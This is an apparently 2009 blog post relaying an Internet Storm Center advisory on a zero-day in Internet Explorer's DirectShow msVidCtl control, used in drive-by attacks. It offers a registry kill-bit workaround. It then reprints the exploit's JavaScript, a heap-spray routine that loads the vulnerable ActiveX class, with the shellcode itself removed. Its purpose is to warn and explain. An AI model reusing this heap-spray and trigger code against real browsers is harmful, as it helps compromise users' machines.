Microsoft Browser Attacked Again!

Perhaps the reason those Microsoft ads showing the barfing were pulled is that some users were barfing when they found out how they were being attacked when using Internet Exploited.

According to the Internet Storm Center, Microsoft Internet Explorer can be zapped hard by a new attack showing up in drive-by fashion.

0-day in Microsoft DirectShow (msvidctl.dll) used in drive-by attacks

Published: 2009-07-06,
Last Updated: 2009-07-06 08:56:55 UTC
by Stephen Hall (Version: 1)

A 0-day exploit within the msVidCtl component of Microsoft DirectShow is actively being exploited through drive-by attacks using thousands of newly compromised web sites, according to CSIS. The code has been published in the public domain via a number of Chinese web sites.

Please keep a watchful eye on your AV and IDS/IPS vendors updates to ensure coverage as early as possible on this exploit as it is likely to be widely deployed with the code being available.

A valid work around for the attack vector is available which set’s the kill bit on the vulnerable DLL.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
“Compatibility Flags”=dword:00000400

So, if you are comfortable doing some registry editing, your temporary fix is above, otherwise, using another browser would be best. (remember to change the default browser, so that clicking on a hyperlink in another application doesn’t get you into trouble!)

Details of the exploit are available on the CSIS web site, but are included below:

var appllaa=’0′;

var nndx=’%'+’u9′+’0′+’9′+’0′+’%u’+'9′+’0′+’9′+appllaa;

[SHELL CODE REMOVED]

var headersize=20;

var omybro=unescape(nndx);

var slackspace=headersize+dashell.length;

while(omybro.length<slackspace)

omybro+=omybro;

bZmybr=omybro.substring(0,slackspace);

shuishiMVP=omybro.substring(0,omybro.length-slackspace);

while(shuishiMVP.length+slackspace<0×30000)

shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;

memory=new Array();

for(x=0;x<300;x++)

memory[x]=shuishiMVP+dashell;

var myObject=document.createElement(‘object’);

DivID.appendChild(myObject);

myObject.width=’1′;

myObject.height=’1′;

myObject.data=’./logo.gif’;

myObject.classid=’clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF’;

Microsoft has more time with browsers than anyone except for Opera, as all the others started after Internet Explorer was first lifted from Mosaic developed. You’d think they would get it right.

Well, better safe than sorry. You know my recommendation, it’s found at the link below.

§

•